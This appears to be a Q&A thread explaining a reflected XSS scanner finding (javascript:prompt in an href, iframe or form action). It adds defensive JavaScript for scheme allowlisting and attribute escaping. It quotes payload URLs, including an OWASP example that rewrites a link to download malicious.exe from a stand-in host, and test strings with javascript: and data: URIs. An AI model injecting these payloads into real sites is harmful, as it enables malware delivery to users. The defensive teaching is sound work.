XSS issue

What does it mean when you receive this error for an aspx file:

URI was set to javascript:prompt(995668)
The input is reflected inside A tag href parameter, a Form tag action parameter or (I)FRAME src parameter.
Lawrence Avery, System Developer, asked:

btan, Exec Consultant, commented:
The error is most often triggered, as in this case, during parsing, meaning the JS is encountered and either the browser cannot parse it to run it or, more likely, the source code takes the JS as an input field for further processing and errors out. An example can simply be from a GET like the one below.

http://goodsite.com/gallery.html?showimage=javascript:evil-script-here

That "showimage" field may be used inside your code in an iframe, link, image URL or form submission function. Most of these are not legitimate and, as stated, there is a high chance of an XSS attempt. You need input validation in all the functions or parameter-parsing code. If the data is evaluated by the page using eval or an equivalent method, attackers can simply feed their script directly into that parameter. A script must never (at least in simple coding) evaluate something passed as a parameter to the page.

It can get even uglier, like another OWASP example (2):
http://example.com/index.php?user=<script>window.onload = function() {var AllLinks=document.getElementsByTagName("a");
AllLinks[0].href = "http://badexample.com/malicious.exe"; }</script>

This will cause the user, clicking on the link supplied by the tester, to download the file malicious.exe from a site he controls.
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)#Example_2
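The validation the answer above calls for, written out as an added example that is not code from this thread, from OWASP or from the asker's aspx page: a scheme allowlist for any value that will be placed into an href, src or action attribute (a "showimage"-style parameter), followed by the attribute escaping such a value still needs. The host goodsite.example, the base URL and the function names are assumptions for illustration; the inputs at the bottom are constructed test values, including the scanner payload from the question. It runs under Node.js using the built-in WHATWG URL class.

```javascript
// Added example, not code from the Experts Exchange thread or from OWASP:
// a defensive scheme allowlist for values that a page will place into an
// href, src or action attribute, plus the attribute escaping such values
// still need afterwards. Runs under Node.js; uses the built-in URL class.

// Only these schemes may reach an href/src/action attribute. javascript:,
// data:, vbscript: and anything else are rejected by omission.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Constructed base of the page that will embed the value; relative inputs
// such as "/gallery/1.jpg" are resolved against it. Hypothetical host.
const PAGE_BASE = "https://goodsite.example/";

// Returns a normalized absolute URL string that is safe to embed, or null
// when the value must be rejected. `allowedHosts` (a Set of hostnames) is
// optional: without it any http(s) host passes, so a protocol-relative
// input like "//evil.example/x" is accepted by the scheme check alone.
function sanitizeUrlForAttribute(raw, { base = PAGE_BASE, allowedHosts = null } = {}) {
  if (typeof raw !== "string" || raw.length === 0 || raw.length > 2048) {
    return null;
  }

  // The WHATWG parser mirrors what browsers do with a URL attribute: it strips
  // leading/trailing whitespace and control characters and removes embedded
  // tab/newline, so " javascript:" and "java\tscript:" both parse to the
  // javascript: scheme and are caught by the allowlist check below.
  let parsed;
  try {
    parsed = new URL(raw, base);
  } catch {
    return null; // unparsable: reject rather than echo the raw value
  }

  // `protocol` is lower-cased by the parser, so "JaVaScRiPt:" is caught too.
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) return null;

  if (allowedHosts !== null && !allowedHosts.has(parsed.hostname)) return null;

  return parsed.href;
}

// A scheme-safe URL still has to be escaped for the HTML attribute context,
// otherwise a quote in the value terminates the attribute early.
function escapeHtmlAttribute(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return value.replace(/[&<>"']/g, (c) => map[c]);
}

// Builds the iframe markup for a showimage-style parameter, restricted to
// the page's own host, or a fixed fallback when the value is rejected.
// The raw input is never echoed back into the page.
function renderImageFrame(showimage) {
  const url = sanitizeUrlForAttribute(showimage, {
    allowedHosts: new Set([new URL(PAGE_BASE).hostname]),
  });
  if (url === null) return "<p>Invalid image reference.</p>";
  return `<iframe src="${escapeHtmlAttribute(url)}"></iframe>`;
}

// Constructed inputs: the scanner payload from the question plus common
// variants, a data: URI, a protocol-relative URL and legitimate values.
const SAMPLE_INPUTS = [
  "javascript:prompt(995668)",
  "JaVaScRiPt:alert(1)",
  " javascript:alert(1)",
  "java\tscript:alert(1)",
  "data:text/html,<script>alert(1)</script>",
  "//evil.example/x",
  "/gallery/1.jpg",
  "https://goodsite.example/gallery/1.jpg",
];

for (const input of SAMPLE_INPUTS) {
  console.log(JSON.stringify(input), "->", renderImageFrame(input));
}
```

The allowlist is on the parsed scheme rather than on a regex over the raw string because browsers normalize case, surrounding whitespace and embedded tab/newline before they decide that an attribute holds a javascript: URL; checking the parsed form keeps the check aligned with that behaviour. The host allowlist is a separate decision: it is what stops a value that passes the scheme check from framing or linking to a third-party site.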
